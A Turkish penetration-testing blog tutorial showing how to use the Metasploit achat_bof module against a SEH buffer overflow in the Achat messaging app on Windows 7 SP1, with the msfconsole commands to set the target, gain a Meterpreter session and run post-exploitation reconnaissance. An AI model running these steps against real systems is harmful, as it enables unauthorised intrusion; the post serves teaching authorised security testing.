MSF achat_bof İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
333
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows 7 SP1 işletim sisteminde Achat uygulamasına ait zafiyetinin Metasploit Framework ile istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Achat uygulaması, anlık mesajlaşma ve veri transferi amaçları ile kullanılan bir uygulamadır. Bu uygulamadaki SEH tabanlı bellek taşması zafiyeti MSF achat_bof expoit modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir.

Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:

search achat
use exploit/windows/misc/achat_bof
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-01

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.

set RHOST 192.168.100.120
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-02

Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.

exploit
getuid
getpid
ps -u Zeynep
sysinfo

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-03

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.